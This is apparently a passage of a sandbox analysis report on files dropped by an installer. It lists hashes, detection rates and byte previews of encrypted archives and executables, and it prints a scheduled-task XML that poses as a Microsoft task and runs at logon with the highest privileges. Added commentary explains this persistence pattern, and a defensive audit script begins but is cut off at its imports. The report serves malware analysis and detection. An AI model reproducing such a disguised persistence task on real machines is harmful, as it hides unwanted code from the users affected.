                                      Preview:.@S....:....,...............o..).f}.....c...+Q....P.....I..q...C..psY...j...Q#>L.S.......n.....wN)=..'....Y.6..-+..H..M;..4....t.....Bs(.h...?4_.....d..e@4.....t8.._...P>.+5'R.k..,.2..M....`..1.N..h..,Z/.).B..4.1XR5p..U...nA)...E.....!....A.\..B..t,..Hn..8.a.g.!.....k#.....&...8Y.....Ar...H.?v...D.a..L3...8..>...d.MZCF.v..K....3.x.*A.r..._>...djA...M...eP.r.,f...'....D4..f}G..5....E.7u.p.u....f.....3y..f={.........l.q..,d[.........Q.]..jR'iQ.......Tk|.i.."...j^S.s.../.tm.......~f.w..6.M!....y..w.....&.......i.[...#.(vl..V.g?t...m..5TN.%........W..s....2....W...%.y&.6...Q._...Y+a..4.X.X..._\.4......_^.8Xm.p...J..1.....}.#...[.....\4P0_*..i..B..!\...R.O3Q.t.......E..?bv.{..W...Z.0.&q.j.....+`}...........H.b...)..M...D.Z.cr.c.J.m..Y.:..y....F.FQ<..3.s.@.w../....GF.PH.K+...._.......5.j1;6..j6|...W...e.\\}...t..-..y...OB....H....+..:g..B`.nb....2.o...T;...b.gv........2B..P1e..t..Q.k1;T..0^...R..).Z.@...+.c.uB.....\.6...C..I...8...n"
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):5649408
                                      Entropy (8bit):6.392614480390128
                                      Encrypted:false
                                      SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                      MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                      SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                      SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                      SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):56546
                                      Entropy (8bit):7.996814134856588
                                      Encrypted:true
                                      SSDEEP:1536:5ltaPvHpC96l8yuZs7O5xYc4l0Vw6FjTHkk78:5vaP/pI7G7ubQAw6R/8
                                      MD5:731DCEB356DC74ECD9DE5DD2323E44FA
                                      SHA1:65E0622ADE1BD3945E3D7860AAE4B32F00B3C8F3
                                      SHA-256:8F9A5351DDDF49F841EC2FD4375288745E3336D0A7A32B7D73404547BEDB0EB1
                                      SHA-512:D0DA6349F2041FB62F758C1CD8ED03BAD40ECAAB71495423EBE920FE7470B0F80B4DA5FAEFB0DE5E0C2F64200009B73671B254F7AA4D97E18071415C8E587D40
                                      Malicious:false
                                      Preview:.@S....j?..l ...............*.\..S.B..'^.q...?...B........kJ...qA.Qe.2H..y......2...N.A.....xAb..c...8.>_{..O7..f....N..b...]..?...O......V.A..M...{_.....\.w..x2.!X.....`..A....K...~u....i....A`.]........g.......8t......1...pS....t...5.... .......0.........|.V.. ..:.J..n;......F$....b1...S.]%.W...?...S0.g..o........"....7..e:........r.NqC....0..?H..T.\-..*.][....'..C|zEK.>.A.._....(%j...8v.l......p.r....X..%D..G.......%)|].c+N...>...cr"*.G...i~Sc]|.Y[N.....J. .YJ....K.bLpc ...G...R..f .A2."..P.\..G?@?N.-.:.A..l.<.+AW.j.$.m.T>.*e.E...>...1e.(... ...w....f....aB|l2..r.=..jZ..n.*...^0~.#.k.W....+..mt.....;.....R..z\.(v...L.....[.. tj /.w.C.#4r.[...I...M.}..].X.S..r..Y...H.4l.#.n.....`.....:..k...#...)....%....(Z..?~..[vE..0.|?....7..x...0..]....`..W.?..$Y........}.P..wW.I.%....p.......(......3.C(..)....V..=.=...m(..Y7.E(_./..jS2..I`...Ae..&.e.oSiH.D=...N.:..&..M....j.Z..8w..........Ys....;.q....M..\..j8.h...".^..%...=./^....-y._.........u.M...i.K
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):56546
                                      Entropy (8bit):7.996814134856595
                                      Encrypted:true
                                      SSDEEP:1536:IDxPHdRX/rHrANzavMASxNWt6F2SAXu6F:yXQzavM3WO2Lu6F
                                      MD5:EFA5A00025A30EB18D9C91B732AA1D0C
                                      SHA1:57F20B3F1A945CA875D746D678481867E14B277B
                                      SHA-256:55F744D7966908EB2BA0A81651E2D9CB5266F169639B47C5BF53E028CA4C1117
                                      SHA-512:B09460ED5607BACF05FCC9C5E01357DCF0E2532AB11E23A77210AFA4503D4F4E35B8A43B3C6B5EBE27EB748F530C778BCEAA0323BE220D06395E660CDB7792F6
                                      Malicious:false
                                      Preview:7z..'.............2.......f.n.&...(..I.\=9.).r...;...}...qgY..U..p..a..".M~4.z.....y.^L....BN.DD.E.........j.$...j..DI...........rN..q.5W}.T./...+Vk...{..Z..C...3.E..[.Ikce...>...jk4....M..m.R!..y..~....E..L...'.w....C...}vM!|.'4..3HmL..99*.a.`.HH..1Y^U_l.V.4..Ct...l....j.g@'.....5.._]......}...k....N.i9v.9ydGWW....}ze:H.$...l.Y..4'$.Z...OOUD.q.y..(.....h.>..tDB..m......E...w...iH....L...U.$Q.j.a..-..riE.F..~.Uy.F.F.i.....)..F2..@<................<...Fxpx..Z._..U..8y.+.....6E.O.R7.\...`..?....-.ti...].-.2.)T...K....!...t.........21.;.(...PP...N.Q...9...%.G.....;\S.M.m9_..2B....=."..4......dsP.g'..).w...-xdJG..K...-.A.g....Ug../......x.:....Y.R:t..G1.x.o..K.?k..l.%;.|\..#[...]...o.&.v...s.1.E.o.._i..Z?..j7&Pq. .q............4.x...5`./N...y..S..y.._~..._T.|t.(..g..a.E.p........p..jc....G.tj.....?..U....<}.v*.6...Y..cc.......Ay...Mr..YP.C..L.J....?..Xf.V./l.....!NDU8.?./..,I;#]!yqZ_-....9{X...#.\...<..!...0..n..n.*....p.5.y.Z..}.=.p.7.NH..E.G...*N.
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):56546
                                      Entropy (8bit):7.996966859255975
                                      Encrypted:true
                                      SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                      MD5:CEA69F993E1CE0FB945A98BF37A66546
                                      SHA1:7114365265F041DA904574D1F5876544506F89BA
                                      SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                      SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                      Malicious:false
                                      Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):56546
                                      Entropy (8bit):7.996966859255979
                                      Encrypted:true
                                      SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                      MD5:4CB8B7E557C80FC7B014133AB834A042
                                      SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                      SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                      SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                      Malicious:false
                                      Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):31890
                                      Entropy (8bit):7.99402458740637
                                      Encrypted:true
                                      SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                      MD5:8622FC7228777F64A47BD6C61478ADD9
                                      SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                      SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                      SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                      Malicious:false
                                      Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):31890
                                      Entropy (8bit):7.99402458740637
                                      Encrypted:true
                                      SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                      MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                      SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                      SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                      SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                      Malicious:false
                                      Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):74960
                                      Entropy (8bit):7.99759370165655
                                      Encrypted:true
                                      SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                      MD5:950338D50B95A25F494EE74E97B7B7A9
                                      SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                      SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                      SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                      Malicious:false
                                      Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):74960
                                      Entropy (8bit):7.997593701656546
                                      Encrypted:true
                                      SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                      MD5:059BA7C31F3E227356CA5F29E4AA2508
                                      SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                      SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                      SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                      Malicious:false
                                      Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):29730
                                      Entropy (8bit):7.994290657653607
                                      Encrypted:true
                                      SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                      MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                      SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                      SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                      SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                      Malicious:false
                                      Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):29730
                                      Entropy (8bit):7.994290657653608
                                      Encrypted:true
                                      SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                      MD5:A9C8A3E00692F79E1BA9693003F85D18
                                      SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                      SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                      SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                      Malicious:false
                                      Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):249984
                                      Entropy (8bit):7.99927430870047
                                      Encrypted:true
                                      SSDEEP:6144:5ca7IDBMN0AXMgKXYYoAGThkbN0lJyx7cLoHAd0cWkkoUEXU2bO:Z7IDC9mb1+WN0Dyhwh0cWloUP2bO
                                      MD5:D129E17A30F3E99E49E639655EB5DEB2
                                      SHA1:302C332A978CB967E95F2B54A713BD1D2F72A131
                                      SHA-256:BE38AB40C78A620589239D5111CD51FFF82D4930C7CB296F579936ADFD2AB05A
                                      SHA-512:39A5F12F479357D0FC8EE5CC23EB1030C152C2FCB673B2FA7675D6C2BE9B5F3C0B2221825CF7BBF551E48D9957ECA21B43394B24812EEEDD8DAB3204DCE79341
                                      Malicious:false
                                      Preview:7z..'......z .......@...........B..(-L"3sS..#..U\..C.]ECa .u%.\.../3a.....=.uK......fO?E..\B.?.2.g.....\d.^(;F$F.....g...{.....nb.~1.....6.,...E.-.b...$Gz/..Qe.......}..a.yI.Nfl......<.\.. ....1.'>..Ex......g.|{......d.@.r...l....w...=k`.`.Mur....k...&".H*......FJ........-R2...:.2V....g7...:"*N..O8..q.9z.9.G..z..>.H....@.;........Hb..}.....{.T.I.s......,......p.B....P.+..j.W."JO.-J..Z ...Vh...%..L.r."z..@tb.(gi....h2...R.X....F.x.cG.....%JaU,.$...d.....".i..|...<..v...>....hf.#.8.. (.3$.x.....l..l..h|%7.S..i.L#L..P.d7Gr...{./.r.o...k.....9..S[...}.KbH.y..\.Qq.uo.O.+Z.Z......G....=@a.*@.M.r......sR...^....d..w.oM&d..&N..?.L`h.`J.~,>.;....)A@..(.......k..T.A9.{V4.......0,.0..<...2.}:..cF.....Q.K\ 6w.....>.+1.#k.P.`.+.d.?.S...{.[........`4.D...R..xo..z...<[.A.w.C.=?..&.!..O.......u4.b...o6..x....J.../...W...t...>i...AN.`..Us>k..y30j..v.......2R.T...6Q.0. V.v.}..l.._...?..b.l..|;..jf....0.......dR.`._....j.i...'.'.....Iy.3S.q.'k.@....o......
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):63640
                                      Entropy (8bit):6.482810107683822
                                      Encrypted:false
                                      SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                      MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                      SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                      SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                      SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 9%
• Antivirus: Virustotal, Detection: 4%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):4096
                                      Entropy (8bit):3.347329250663303
                                      Encrypted:false
                                      SSDEEP:48:dXKLzDlnbL6w0QldOVQOj933ODOiTdKbKsz72eW+5y9:dXazDlnKwhldOVQOj6dKbKsz7
                                      MD5:0B22A2EDD065A1C81E971548277C256F
                                      SHA1:E8C9021B2A56BD2845B2E4322A77755AE12FE197
                                      SHA-256:C45C719A48CE574E67FDA9B816E972913BDCC33A5B414DFC9A31E5B55118E50B
                                      SHA-512:8D36C6B062EB505CCF3B2E69307FD2526D8FD0D6DA411E8E26266ACC7DFD4B7330B01CF7161F0F8CB6B75C547A3F15525EF5DC18BB25BE34B214522D24942E95
                                      Malicious:false
                                      Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvai
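The task file above is the persistence artifact of this sample: a top-level task URI (`\kafanbbs`) carrying RegistrationInfo copied from a Microsoft system task, a LogonTrigger, `RunLevel` HighestAvailable and `AllowHardTerminate` false. The following is an added example (not Joe Sandbox code) of a check an analyst would run over `C:\Windows\System32\Tasks` to find tasks with that profile. The two sample tasks are constructed: the first reproduces the visible fields of the dropped task and adds a hypothetical `<Actions>` block, because the preview is cut off before that element; the second is a benign Microsoft-style task for contrast.

```python
"""Audit scheduled-task XML for the persistence pattern of the dropped \\kafanbbs task.

Added example, not Joe Sandbox code. Sample tasks are constructed; the Exec command
in DROPPED_TASK is hypothetical (the report's preview ends before <Actions>).
"""
import os
import sys
import xml.etree.ElementTree as ET

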